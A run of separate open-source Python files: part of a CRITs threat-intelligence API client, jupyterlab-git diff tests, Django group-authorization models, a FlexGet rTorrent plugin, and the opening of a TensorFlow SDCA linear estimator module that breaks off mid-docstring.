return self._post(self._ACTOR_IDENTIFIERS, params)
def add_campaign(self, name, params={}):
params['name'] = name
return self._post(self._CAMPAIGNS, params)
def add_certificate(self, source, file_obj=None, filepath=None,
filename=None, params={}):
if not file_obj and not filepath:
raise pycritsFetchError("Need a file object or filepath")
files = self._get_file_data(file_obj, filepath, filename)
params['source'] = source
return self._post(self._CERTIFICATES, params, files=files)
def add_domain(self, domain, source, params={}):
params['domain'] = domain
params['source'] = source
return self._post(self._DOMAINS, params)
def add_email(self, type_, source, file_obj=None, filepath=None,
filename=None, params={}):
files = self._get_file_data(file_obj, filepath, filename)
params['upload_type'] = type_
params['source'] = source
return self._post(self._EMAILS, params, files=files)
def add_event(self, type_, title, description, source, params={}):
params['event_type'] = type_
params['title'] = title
params['description'] = description
params['source'] = source
return self._post(self._EVENTS, params)
def add_indicator(self, type_, value, source, params={}):
params['type'] = type_
params['value'] = value
params['source'] = source
return self._post(self._INDICATORS, params)
def add_ip(self, ip, type_, source, params={}):
params['source'] = source
params['ip'] = ip
params['ip_type'] = type_
return self._post(self._IPS, params)
def add_pcap(self, source, file_obj=None, filepath=None, filename=None,
params={}):
if not file_obj and not filepath:
raise pycritsFetchError("Need a file object or filepath")
files = self._get_file_data(file_obj, filepath, filename)
params['source'] = source
return self._post(self._PCAPS, params, files=files)
def add_raw_data(self, type_, title, data_type, source, data=None,
file_obj=None, filepath=None, filename=None, params={}):
files = self._get_file_data(file_obj, filepath, filename)
params['data'] = data
params['upload_type'] = type_
params['title'] = title
params['data_type'] = data_type
params['source'] = source
return self._post(self._RAW_DATA, params, files=files)
def add_sample(self, type_, source, file_obj=None, filepath=None,
filename=None, params={}):
files = self._get_file_data(file_obj, filepath, filename)
# Set filename so it is honored for metadata uploads too.
params['upload_type'] = type_
params['filename'] = filename
params['source'] = source
return self._post(self._SAMPLES, params, files=files)
def add_screenshot(self, type_, oid, otype, source, file_obj=None,
filepath=None, filename=None, params={}):
files = self._get_file_data(file_obj, filepath, filename)
params['upload_type'] = type_
params['oid'] = oid
params['otype'] = otype
params['source'] = source
return self._post(self._SCREENSHOTS, params, files=files)
def add_target(self, email, params={}):
params['email_address'] = email
return self._post(self._TARGETS, params)
def add_relationship(self, left_type, left_id, right_type, right_id,
rel_type, params={}):
params['left_type'] = left_type
params['right_type'] = right_type
params['left_id'] = left_id
params['right_id'] = right_id
params['rel_type'] = rel_type
return self._post(self._RELATIONSHIPS, params)
|
|
import json
import nbformat
from pathlib import Path
from subprocess import CalledProcessError
from unittest.mock import patch
import pytest
import tornado
from jupyterlab_git.git import Git
from .testutils import maybe_future
@pytest.mark.asyncio
async def test_changed_files_invalid_input():
with pytest.raises(tornado.web.HTTPError):
await Git().changed_files(
path="test-path", base="64950a634cd11d1a01ddfedaeffed67b531cb11e"
)
@pytest.mark.asyncio
async def test_changed_files_single_commit():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future((0, "file1.ipynb\x00file2.py\x00", ""))
# When
actual_response = await Git().changed_files(
path="test-path",
single_commit="64950a634cd11d1a01ddfedaeffed67b531cb11e^!",
)
# Then
mock_execute.assert_called_once_with(
[
"git",
"diff",
"64950a634cd11d1a01ddfedaeffed67b531cb11e^!",
"--name-only",
"-z",
],
cwd="test-path",
)
assert {"code": 0, "files": ["file1.ipynb", "file2.py"]} == actual_response
@pytest.mark.asyncio
async def test_changed_files_working_tree():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future((0, "file1.ipynb\x00file2.py", ""))
# When
actual_response = await Git().changed_files(
path="test-path", base="WORKING", remote="HEAD"
)
# Then
mock_execute.assert_called_once_with(
["git", "diff", "HEAD", "--name-only", "-z"],
cwd="test-path",
)
assert {"code": 0, "files": ["file1.ipynb", "file2.py"]} == actual_response
@pytest.mark.asyncio
async def test_changed_files_index():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future((0, "file1.ipynb\x00file2.py", ""))
# When
actual_response = await Git().changed_files(
path="test-path", base="INDEX", remote="HEAD"
)
# Then
mock_execute.assert_called_once_with(
["git", "diff", "--staged", "HEAD", "--name-only", "-z"],
cwd="test-path",
)
assert {"code": 0, "files": ["file1.ipynb", "file2.py"]} == actual_response
@pytest.mark.asyncio
async def test_changed_files_two_commits():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future((0, "file1.ipynb\x00file2.py", ""))
# When
actual_response = await Git().changed_files(
path="test-path", base="HEAD", remote="origin/HEAD"
)
# Then
mock_execute.assert_called_once_with(
["git", "diff", "HEAD", "origin/HEAD", "--name-only", "-z"],
cwd="test-path",
)
assert {"code": 0, "files": ["file1.ipynb", "file2.py"]} == actual_response
@pytest.mark.asyncio
async def test_changed_files_git_diff_error():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.side_effect = CalledProcessError(128, b"cmd", b"error message")
# When
actual_response = await Git().changed_files(
path="test-path", base="HEAD", remote="origin/HEAD"
)
# Then
mock_execute.assert_called_once_with(
["git", "diff", "HEAD", "origin/HEAD", "--name-only", "-z"],
cwd="test-path",
)
assert {"code": 128, "message": "error message"} == actual_response
@pytest.mark.asyncio
@pytest.mark.parametrize(
"args, cli_result, cmd, expected",
[
(
("dummy.txt", "ar539ie5", "/bin"),
(0, "2\t1\tdummy.txt", ""),
[
"git",
"diff",
"--numstat",
"4b825dc642cb6eb9a060e54bf8d69288fbee4904",
"ar539ie5",
"--",
"dummy.txt",
],
False,
),
(
("dummy.png", "ar539ie5", "/bin"),
(0, "-\t-\tdummy.png", ""),
[
"git",
"diff",
"--numstat",
"4b825dc642cb6eb9a060e54bf8d69288fbee4904",
"ar539ie5",
"--",
"dummy.png",
],
True,
),
(
("dummy.txt", "INDEX", "/bin"),
(0, "2\t1\tdummy.txt", ""),
[
"git",
"diff",
"--numstat",
"--cached",
"4b825dc642cb6eb9a060e54bf8d69288fbee4904",
"--",
"dummy.txt",
],
False,
),
(
("dummy.png", "INDEX", "/bin"),
(0, "-\t-\tdummy.png", ""),
[
"git",
"diff",
"--numstat",
"--cached",
"4b825dc642cb6eb9a060e54bf8d69288fbee4904",
"--",
"dummy.png",
],
True,
),
(
("dummy.txt", "ar539ie5", "/bin"),
(128, "", "fatal: Git command failed"),
[
"git",
"diff",
"--numstat",
"4b825dc642cb6eb9a060e54bf8d69288fbee4904",
"ar539ie5",
"--",
"dummy.txt",
],
tornado.web.HTTPError,
),
(
("dummy.txt", "ar539ie5", "/bin"),
(
128,
"",
"fatal: Path 'dummy.txt' does not exist (neither on disk nor in the index)",
),
[
"git",
"diff",
"--numstat",
"4b825dc642cb6eb9a060e54bf8d69288fbee4904",
"ar539ie5",
"--",
"dummy.txt",
],
False,
),
],
)
async def test_is_binary_file(args, cli_result, cmd, expected):
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future(cli_result)
if isinstance(expected, type) and issubclass(expected, Exception):
with pytest.raises(expected):
await Git()._is_binary(*args)
else:
# When
actual_response = await Git()._is_binary(*args)
# Then
mock_execute.assert_called_once_with(cmd, cwd="/bin")
assert actual_response == expected
@pytest.mark.asyncio
async def test_Git_get_nbdiff_file():
HERE = Path(__file__).parent.resolve()
manager = Git()
prev_content = (HERE / "samples" / "ipynb_base.json").read_text()
curr_content = (HERE / "samples" / "ipynb_remote.json").read_text()
result = await manager.get_nbdiff(prev_content, curr_content)
expected_result = json.loads((HERE / "samples" / "ipynb_nbdiff.json").read_text())
assert result == expected_result
@pytest.mark.asyncio
async def test_Git_get_nbdiff_dict():
HERE = Path(__file__).parent.resolve()
manager = Git()
prev_content = json.loads((HERE / "samples" / "ipynb_base.json").read_text())
curr_content = json.loads((HERE / "samples" / "ipynb_remote.json").read_text())
result = await manager.get_nbdiff(prev_content, curr_content)
expected_result = json.loads((HERE / "samples" / "ipynb_nbdiff.json").read_text())
assert result == expected_result
@pytest.mark.asyncio
async def test_Git_get_nbdiff_no_content():
HERE = Path(__file__).parent.resolve()
manager = Git()
result = await manager.get_nbdiff("", "")
assert result == {
"base": nbformat.versions[nbformat.current_nbformat].new_notebook(),
"diff": [],
}
|
|
from django.db import models
from wsgiref.handlers import format_date_time
import time
from authz_group.authz_implementation.solstice import (
SolsticeCrowdImplementation)
from django.conf import settings
class Person(models.Model):
person_id = models.AutoField(primary_key=True, db_column='person_id')
login_name = models.TextField(max_length=128, db_column='login_name')
name = models.TextField(max_length=255, db_column='name')
# This is a shim for an approach to handle scoped login names.
# If you had joe@google.com, and joe@yahoo.com, google.com could be
# login_realm:1, and yahoo.com login_realm:2, so the users would be stored
# as (joe, 1) and (joe, 2)
# This was done as an easy way to separate privileges by where a person is
# from.
login_realm_id = models.IntegerField(db_column='login_realm_id', default=1)
class Meta:
db_table = 'Person'
class Crowd(models.Model):
id = models.AutoField(primary_key=True, db_column='group_id')
source_key = models.CharField(max_length=100, db_column='source_key',
db_index=True)
source_type = models.CharField(max_length=100, db_column='model_package')
owners = models.ManyToManyField(Person, through='CrowdOwner')
_source_types = {}
def get_group(self):
if self._group:
return self._group
raise Exception("Not implemented!")
def is_member(self, login_name):
backend = self.get_backend_for_source(self.source_type)
return backend().is_member_of_group(login_name, self.source_key)
def json_data_structure(self):
css_source_type = self.source_type.replace(':', '-')
data = {
'id': self.id,
'source_key': self.source_key,
'source_type': self.source_type,
'css_source_type': css_source_type,
'implementation': [],
}
group = self.get_group()
if (hasattr(group, 'json_data_structure')):
data["implementation"] = group.json_data_structure()
return data
@staticmethod
def get_crowds_for_user(login_name):
all_groups = []
for implementation in Crowd.get_crowd_backends():
impl_groups = implementation.get_groups_for_user(login_name)
all_groups.extend(impl_groups)
return Crowd.wrap_implementations_in_crowds(all_groups)
@staticmethod
def get_crowd_backends():
# XXX
if hasattr(settings, 'AUTHZ_GROUP_CROWD_IMPLEMENTATIONS'):
pass
return [SolsticeCrowdImplementation]
@staticmethod
def wrap_implementations_in_crowds(implementation_groups):
wrapped = []
for group in implementation_groups:
wrapped.append(Crowd._wrap_group(group))
return wrapped
@staticmethod
def _wrap_group(group):
crowd, created = Crowd.objects.get_or_create(
source_key=group.id, source_type=group.get_source_type())
crowd._group = group
return crowd
@staticmethod
def register_source_types():
for backend in Crowd.get_crowd_backends():
Crowd._source_types[backend.get_source_type()] = backend
@staticmethod
def get_backend_for_source(source_type):
if source_type in Crowd._source_types:
return Crowd._source_types[source_type]
raise UnknownCrowdBackendException(source_type)
class Meta:
db_table = 'GroupWrapper'
unique_together = ('source_key', 'source_type')
class UnknownCrowdBackendException(Exception):
pass
Crowd.register_source_types()
class CrowdOwner(models.Model):
id = models.AutoField(db_column='group_owner_id', primary_key=True)
group = models.ForeignKey(Crowd, db_column='group_id')
person = models.ForeignKey(Person, db_column='person_id', db_index=True)
class Meta:
db_table = 'GroupOwner'
unique_together = ('group', 'person')
# This is supporting the solstice authz_implemention
class SolsticeCrowd(models.Model):
id = models.AutoField(db_column='source_key', primary_key=True)
creator = models.ForeignKey(Person, db_column='creator_id',
related_name='creator_person')
application = models.CharField(max_length=255, db_column='application')
is_visible = models.BooleanField(db_column='is_visible', default=False)
name = models.CharField(max_length=255, db_column='name')
description = models.TextField(db_column='description')
date_created = models.DateTimeField(db_column='date_created')
date_modified = models.DateTimeField(db_column='date_modified')
member_string = models.CharField(max_length=255, db_column='member_str')
owners = models.ManyToManyField(Person, through='SolsticeCrowdOwner',
related_name='sol_crowd_owner')
def json_data_structure(self):
return {
'name': self.name,
'description': self.description,
'date_modified': format_date_time(time.mktime(
self.date_modified.timetuple())),
'date_created': format_date_time(time.mktime(
self.date_created.timetuple())),
'member_string': self.member_string,
}
def get_source_type(self):
return SolsticeCrowdImplementation.get_source_type()
class Meta:
db_table = 'Crowd'
class SolsticeCrowdMember(models.Model):
sol_crowd = models.ForeignKey(SolsticeCrowd, db_column='crowd_id',
db_index=True)
person = models.ForeignKey(Person, db_column='person_id', db_index=True)
class Meta:
db_table = 'PeopleInCrowd'
unique_together = ('sol_crowd', 'person')
class SolsticeCrowdOwner(models.Model):
id = models.AutoField(db_column='crowd_owner_id', primary_key=True)
sol_crowd = models.ForeignKey(SolsticeCrowd, db_column='crowd_id')
person = models.ForeignKey(Person, db_column='person_id', db_index=True)
class Meta:
db_table = 'CrowdOwner'
unique_together = ('sol_crowd', 'person')
# This is supporting the uw_group_service authz_implemention
class GWSCrowd(models.Model):
id = models.IntegerField(db_column='id')
source_key = models.CharField(db_column='source_key', primary_key=True,
max_length=255)
name = models.CharField(max_length=255, db_column='name')
description = models.TextField(db_column='description')
date_created = models.DateTimeField(db_column='date_created')
date_modified = models.DateTimeField(db_column='date_modified')
date_reconciled = models.DateTimeField(db_column='date_reconciled')
def json_data_structure(self):
return {
'name': self.name,
'description': self.description,
'date_modified': format_date_time(time.mktime(
self.date_modified.timetuple())),
'date_created': format_date_time(time.mktime(
self.date_created.timetuple())),
}
def get_source_type(self):
return UWGroupService.get_source_type()
class Meta:
db_table = 'GWSGroup'
class GWSCrowdOwner(models.Model):
id = models.AutoField(db_column='gws_viewers_id', primary_key=True)
gws_crowd = models.ForeignKey(GWSCrowd, db_column='source_key')
person_id = models.IntegerField(db_column='person_id', db_index=True)
class Meta:
db_table = 'GWSViewers'
unique_together = ('gws_crowd', 'person_id')
|
|
import logging
import sys
import os
import socket
import re
import xmlrpclib
from time import sleep
from urlparse import urlparse
from flexget.utils.template import RenderError
from flexget.utils.pathscrub import pathscrub
from flexget import plugin
from flexget.event import event
from flexget.entry import Entry
from flexget.config_schema import one_or_more
from flexget.utils.bittorrent import Torrent, is_torrent_file
log = logging.getLogger('rtorrent')
class SCGITransport(xmlrpclib.Transport):
""" Used to override the default xmlrpclib transport to support SCGI """
def request(self, host, handler, request_body, verbose=False):
return self.single_request(host, handler, request_body, verbose)
def single_request(self, host, handler, request_body, verbose=0):
# Add SCGI headers to the request.
headers = [('CONTENT_LENGTH', str(len(request_body))), ('SCGI', '1')]
header = '\x00'.join(['%s\x00%s' % (key, value) for key, value in headers]) + '\x00'
header = '%d:%s' % (len(header), header)
request_body = '%s,%s' % (header, request_body)
sock = None
try:
if host:
parsed_host = urlparse(host)
host = parsed_host.hostname
port = parsed_host.port
addr_info = socket.getaddrinfo(host, int(port), socket.AF_INET, socket.SOCK_STREAM)
sock = socket.socket(*addr_info[0][:3])
sock.connect(addr_info[0][4])
else:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(handler)
self.verbose = verbose
if sys.version_info[0] > 2:
sock.send(bytes(request_body, 'utf-8'))
else:
sock.send(request_body)
return self.parse_response(sock.makefile())
finally:
if sock:
sock.close()
def parse_response(self, response):
p, u = self.getparser()
response_body = ''
while True:
data = response.read(1024)
if not data:
break
response_body += data
if self.verbose:
log.info('body:', repr(response_body))
# Remove SCGI headers from the response.
response_header, response_body = re.split(r'\n\s*?\n', response_body, maxsplit=1)
p.feed(response_body)
p.close()
return u.close()
class SCGIServerProxy(xmlrpclib.ServerProxy):
""" Enable connection to SCGI proxy """
def __init__(self, uri, transport=None, encoding=None, verbose=False, allow_none=False, use_datetime=False):
parsed_uri = urlparse(uri)
self.uri = uri
self.__host = uri
self.__handler = parsed_uri.path
if not self.__handler:
self.__handler = '/'
if not transport:
transport = SCGITransport(use_datetime=use_datetime)
self.__transport = transport
self.__encoding = encoding
self.__verbose = verbose
self.__allow_none = allow_none
def __close(self):
self.__transport.close()
def __request(self, method_name, params):
# call a method on the remote server
request = xmlrpclib.dumps(params, method_name, encoding=self.__encoding, allow_none=self.__allow_none)
response = self.__transport.request(self.uri, self.__handler, request, verbose=self.__verbose)
if len(response) == 1:
response = response[0]
return response
def __repr__(self):
return '<SCGIServerProxy for %s%s>' % (self.__host, self.__handler)
def __getattr__(self, name):
# magic method dispatcher
return xmlrpclib._Method(self.__request, name)
# note: to call a remote object with an non-standard name, use
# result getattr(server, "strange-python-name")(args)
def __call__(self, attr):
"""
A workaround to get special attributes on the ServerProxy
without interfering with the magic __getattr__
"""
if attr == 'close':
return self.__close
elif attr == 'transport':
return self.__transport
raise AttributeError('Attribute %r not found' % (attr,))
class RTorrent(object):
""" rTorrent API client """
default_fields = [
'hash',
'name',
'up_total', 'down_total', 'down_rate',
'is_open', 'is_active',
'custom1', 'custom2', 'custom3', 'custom4', 'custom5',
'state', 'complete',
'bytes_done', 'down.rate', 'left_bytes',
'ratio',
'base_path',
]
required_fields = [
'hash',
'name',
'base_path'
]
def __init__(self, uri, username=None, password=None):
"""
New connection to rTorrent
:param uri: RTorrent URL. Supports both http(s) and scgi
:param username: Username for basic auth over http(s)
:param password: Password for basic auth over http(s)
"""
self.uri = uri
self.username = username
self.password = password
self._version = None
parsed_uri = urlparse(uri)
# Reformat uri with username and password for HTTP(s) Auth
if self.username and self.password:
if parsed_uri.scheme not in ['http', 'https']:
raise IOError('Username and password only supported on http(s)')
data = {
'scheme': parsed_uri.scheme,
'hostname': parsed_uri.hostname,
'port': parsed_uri.port,
'path': parsed_uri.path,
'query': parsed_uri.query,
'username': self.username,
'password': self.password,
}
self.uri = '%(scheme)s://%(username)s:%(password)s@%(hostname)s%(path)s%(query)s' % data
# Determine the proxy server
if parsed_uri.scheme in ['http', 'https']:
sp = xmlrpclib.ServerProxy
elif parsed_uri.scheme == 'scgi':
sp = SCGIServerProxy
else:
raise IOError('Unsupported scheme %s for uri %s' % (parsed_uri.scheme, self.uri))
self._server = sp(self.uri)
def _clean_fields(self, fields, reverse=False):
if not fields:
fields = self.default_fields
if reverse:
for field in ['up.total', 'down.total', 'down.rate']:
if field in fields:
fields[fields.index(field)] = field.replace('.', '_')
return fields
for required_field in self.required_fields:
if required_field not in fields:
fields.insert(0, required_field)
for field in ['up_total', 'down_total', 'down_rate']:
if field in fields:
fields[fields.index(field)] = field.replace('_', '.')
return fields
@property
def version(self):
return [int(v) for v in self._server.system.client_version().split('.')]
def load(self, raw_torrent, fields={}, start=False, mkdir=True):
# First param is empty 'target'
params = ['', xmlrpclib.Binary(raw_torrent)]
# Additional fields to set
for key, val in fields.iteritems():
# Values must be escaped if within params
params.append('d.%s.set=%s' % (key, re.escape(str(val))))
if mkdir and 'directory' in fields:
result = self._server.execute.throw('', 'mkdir', '-p', fields['directory'])
if result != 0:
raise xmlrpclib.Error('Failed creating directory %s' % fields['directory'])
# Call load method and return the response
if start:
return self._server.load.raw_start(*params)
else:
return self._server.load.raw(*params)
def torrent(self, info_hash, fields=default_fields):
""" Get the details of a torrent """
fields = self._clean_fields(fields)
multi_call = xmlrpclib.MultiCall(self._server)
for field in fields:
method_name = 'd.%s' % field
getattr(multi_call, method_name)(info_hash)
resp = multi_call()
# TODO: Maybe we should return a named tuple or a Torrent class?
return dict(zip(self._clean_fields(fields, reverse=True), [val for val in resp]))
def torrents(self, view='main', fields=default_fields):
fields = self._clean_fields(fields)
params = ['d.%s=' % field for field in fields]
params.insert(0, view)
resp = self._server.d.multicall(params)
# Response is formatted as a list of lists, with just the values
return [dict(zip(self._clean_fields(fields, reverse=True), val)) for val in resp]
def update(self, info_hash, fields):
multi_call = xmlrpclib.MultiCall(self._server)
for key, val in fields.iteritems():
method_name = 'd.%s.set' % key
getattr(multi_call, method_name)(info_hash, str(val))
return multi_call()[0]
def delete(self, info_hash):
return self._server.d.erase(info_hash)
def stop(self, info_hash):
self._server.d.stop(info_hash)
return self._server.d.close(info_hash)
def start(self, info_hash):
return self._server.d.start(info_hash)
def move(self, info_hash, dst_path):
self.stop(info_hash)
torrent = self.torrent(info_hash, fields=['base_path'])
try:
log.verbose('Creating destination directory `%s`' % dst_path)
self._server.execute.throw('', 'mkdir', '-p', dst_path)
except xmlrpclib.Error:
raise xmlrpclib.Error("unable to create folder %s" % dst_path)
self._server.execute.throw('', 'mv', '-u', torrent['base_path'], dst_path)
self._server.d.set_directory(info_hash, dst_path)
self.start(info_hash)
class RTorrentPluginBase(object):
priority_map = {
'high': 3,
'medium': 2,
'low': 1,
'off': 0,
}
def _build_options(self, config, entry, entry_first=True):
options = {}
for opt_key in ('path', 'message', 'priority',
'custom1', 'custom2', 'custom3', 'custom4', 'custom5'):
# Values do not merge config with task
# Task takes priority then config is used
entry_value = entry.get(opt_key)
config_value = config.get(opt_key)
if entry_first:
if entry_value:
options[opt_key] = entry.render(entry_value)
elif config_value:
options[opt_key] = entry.render(config_value)
else:
if config_value:
options[opt_key] = entry.render(config_value)
elif entry_value:
options[opt_key] = entry.render(entry_value)
# Convert priority from string to int
priority = options.get('priority')
if priority and priority in self.priority_map:
options['priority'] = self.priority_map[priority]
# Map Flexget path to directory in rTorrent
if options.get('path'):
options['directory'] = options['path']
del options['path']
if 'directory' in options:
options['directory'] = pathscrub(options['directory'])
return options
def on_task_start(self, task, config):
try:
client = RTorrent(config['uri'], username=config.get('username'), password=config.get('password'))
if client.version < [0, 9, 4]:
task.abort('rtorrent version >=0.9.4 required, found {0}'.format('.'.join(map(str, client.version))))
except (IOError, xmlrpclib.Error) as e:
raise plugin.PluginError("Couldn't connect to rTorrent: %s" % str(e))
class RTorrentOutputPlugin(RTorrentPluginBase):
schema = {
'type': 'object',
'properties': {
# connection info
'uri': {'type': 'string'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'start': {'type': 'boolean', 'default': True},
'mkdir': {'type': 'boolean', 'default': True},
'action': {'type': 'string', 'emun': ['update', 'delete', 'add'], 'default': 'add'},
# properties to set on rtorrent download object
'message': {'type': 'string'},
'priority': {'type': 'string'},
'path': {'type': 'string'},
'custom1': {'type': 'string'},
'custom2': {'type': 'string'},
'custom3': {'type': 'string'},
'custom4': {'type': 'string'},
'custom5': {'type': 'string'},
},
'required': ['uri'],
'additionalProperties': False,
}
def _verify_load(self, client, info_hash):
for i in range(0, 5):
try:
return client.torrent(info_hash, fields=['hash'])
except (IOError, xmlrpclib.Error):
sleep(0.5)
raise
def on_task_download(self, task, config):
# If the download plugin is not enabled, we need to call it to get
# our temp .torrent files
if config['action'] == 'add' and 'download' not in task.config:
download = plugin.get_plugin_by_name('download')
download.instance.get_temp_files(task, handle_magnets=True, fail_html=True)
def on_task_output(self, task, config):
client = RTorrent(config['uri'], username=config.get('username'), password=config.get('password'))
for entry in task.accepted:
if task.options.test:
log.info('Would add %s to rTorrent' % entry['url'])
continue
if config['action'] == 'add':
try:
options = self._build_options(config, entry)
except RenderError as e:
entry.fail("failed to render properties %s" % str(e))
continue
self.add_entry(client, entry, options, start=config['start'], mkdir=config['mkdir'])
info_hash = entry.get('torrent_info_hash')
if not info_hash:
entry.fail('Failed to %s as no info_hash found' % config['action'])
continue
if config['action'] == 'delete':
self.delete_entry(client, entry)
if config['action'] == 'update':
self.update_entry(client, entry, config)
def delete_entry(self, client, entry):
try:
client.delete(entry['torrent_info_hash'])
log.verbose('Deleted %s (%s) in rtorrent ' % (entry['title'], entry['torrent_info_hash']))
except (IOError, xmlrpclib.Error) as e:
entry.fail('Failed to delete: %s' % str(e))
return
def update_entry(self, client, entry, config):
info_hash = entry['torrent_info_hash']
# First check if it already exists
try:
existing = client.torrent(info_hash, fields=['base_path'])
except IOError as e:
entry.fail("Error updating torrent %s" % str(e))
return
except xmlrpclib.Error as e:
existing = False
# Build options but make config values override entry values
try:
options = self._build_options(config, entry, entry_first=False)
except RenderError as e:
entry.fail("failed to render properties %s" % str(e))
return
if existing and 'directory' in options:
# Check if changing to another directory which requires a move
if options['directory'] != existing['base_path']\
and options['directory'] != os.path.dirname(existing['base_path']):
try:
log.verbose("Path is changing, moving files from '%s' to '%s'"
% (existing['base_path'], options['directory']))
client.move(info_hash, options['directory'])
except (IOError, xmlrpclib.Error) as e:
entry.fail('Failed moving torrent: %s' % str(e))
return
# Remove directory from update otherwise rTorrent will append the title to the directory path
if 'directory' in options:
del options['directory']
try:
client.update(info_hash, options)
log.verbose('Updated %s (%s) in rtorrent ' % (entry['title'], info_hash))
except (IOError, xmlrpclib.Error) as e:
entry.fail('Failed to update: %s' % str(e))
return
def add_entry(self, client, entry, options, start=True, mkdir=False):
if 'torrent_info_hash' not in entry:
entry.fail('missing torrent_info_hash')
return
if entry['url'].startswith('magnet:'):
torrent_raw = 'd10:magnet-uri%d:%se' % (len(entry['url']), entry['url'])
else:
# Check that file is downloaded
if 'file' not in entry:
entry.fail('file missing?')
return
# Verify the temp file exists
if not os.path.exists(entry['file']):
entry.fail("Downloaded temp file '%s' doesn't exist!?" % entry['file'])
return
# Verify valid torrent file
if not is_torrent_file(entry['file']):
entry.fail("Downloaded temp file '%s' is not a torrent file" % entry['file'])
return
try:
with open(entry['file'], 'rb') as f:
torrent_raw = f.read()
except IOError as e:
entry.fail('Failed to add to rTorrent %s' % str(e))
return
try:
Torrent(torrent_raw)
except SyntaxError as e:
entry.fail('Strange, unable to decode torrent, raise a BUG: %s' % str(e))
return
# First check if it already exists
try:
if client.torrent(entry['torrent_info_hash']):
log.warning("Torrent %s already exists, won't add" % entry['title'])
return
except IOError as e:
entry.fail("Error checking if torrent already exists %s" % str(e))
except xmlrpclib.Error:
# No existing found
pass
try:
resp = client.load(torrent_raw, fields=options, start=start, mkdir=mkdir)
if resp != 0:
entry.fail('Failed to add to rTorrent invalid return value %s' % resp)
except (IOError, xmlrpclib.Error) as e:
entry.fail('Failed to add to rTorrent %s' % str(e))
return
# Verify the torrent loaded
try:
self._verify_load(client, entry['torrent_info_hash'])
log.info('%s added to rtorrent' % entry['title'])
except (IOError, xmlrpclib.Error) as e:
entry.fail('Failed to verify torrent loaded: %s' % str(e))
def on_task_exit(self, task, config):
""" Make sure all temp files are cleaned up when task exists """
# If download plugin is enabled, it will handle cleanup.
if 'download' not in task.config:
download = plugin.get_plugin_by_name('download')
download.instance.cleanup_temp_files(task)
on_task_abort = on_task_exit
class RTorrentInputPlugin(RTorrentPluginBase):
schema = {
'type': 'object',
'properties': {
'uri': {'type': 'string'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'view': {'type': 'string', 'default': 'main'},
'fields': one_or_more({'type': 'string', 'enum': RTorrent.default_fields}),
},
'required': ['uri'],
'additionalProperties': False
}
def on_task_input(self, task, config):
client = RTorrent(config['uri'], username=config.get('username'), password=config.get('password'))
fields = config.get('fields')
try:
torrents = client.torrents(config['view'], fields=fields)
except (IOError, xmlrpclib.Error) as e:
task.abort('Could not get torrents (%s): %s' % (config['view'], e))
return
entries = []
for torrent in torrents:
entry = Entry(
title=torrent['name'],
url='%s/%s' % (config['uri'], torrent['hash']),
path=torrent['base_path'],
torrent_info_hash=torrent['hash'],
)
for attr, value in torrent.iteritems():
entry[attr] = value
entries.append(entry)
return entries
@event('plugin.register')
def register_plugin():
plugin.register(RTorrentOutputPlugin, 'rtorrent', api_ver=2)
plugin.register(RTorrentInputPlugin, 'from_rtorrent', api_ver=2)
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear Estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.python.training import training_util
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.linear_optimizer.python import sdca_optimizer
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import session_run_hook
def _head_is_valid_for_sdca(head):
"""Returns true if the provided head is supported by SDCAOptimizer."""
# pylint: disable=protected-access
return isinstance(head, head_lib._BinaryLogisticHead) or isinstance(
head, head_lib._BinarySvmHead) or isinstance(head,
head_lib._RegressionHead)
# pylint: enable=protected-access
def _add_bias_column(feature_columns, columns_to_tensors, bias_variable,
columns_to_variables):
"""Adds a fake bias feature column filled with all 1s."""
# TODO(b/31008490): Move definition to a common constants place.
bias_column_name = "tf_virtual_bias_column"
if any(col.name is bias_column_name for col in feature_columns):
raise ValueError("%s is a reserved column name." % bias_column_name)
if not feature_columns:
raise ValueError("feature_columns can't be empty.")
# Loop through input tensors until we can figure out batch_size.
batch_size = None
for column in columns_to_tensors.values():
if isinstance(column, tuple):
column = column[0]
if isinstance(column, sparse_tensor.SparseTensor):
shape = tensor_util.constant_value(column.dense_shape)
if shape is not None:
batch_size = shape[0]
break
else:
batch_size = array_ops.shape(column)[0]
break
if batch_size is None:
raise ValueError("Could not infer batch size from input features.")
bias_column = layers.real_valued_column(bias_column_name)
columns_to_tensors[bias_column] = array_ops.ones(
[batch_size, 1], dtype=dtypes.float32)
columns_to_variables[bias_column] = [bias_variable]
def sdca_model_fn(features, labels, mode, params, config=None):
"""A model_fn for linear models that use the SDCA optimizer.
Args:
features: A dict of `Tensor` keyed by column name.
labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
dtype `int32` or `int64` with values in the set {0, 1}.
mode: Defines whether this is training, evaluation or prediction.
See `ModeKeys`.
params: A dict of hyperparameters.
The following hyperparameters are expected:
* head: A `Head` instance. Type must be one of `_BinarySvmHead`,
`_RegressionHead` or `_BinaryLogisticHead`.
* feature_columns: An iterable containing all the feature columns used by
the model.
* l1_regularization: Global (across all examples) L1-regularization
parameter.
* l2_regularization: Global (across all examples) L2-regularization
parameter.
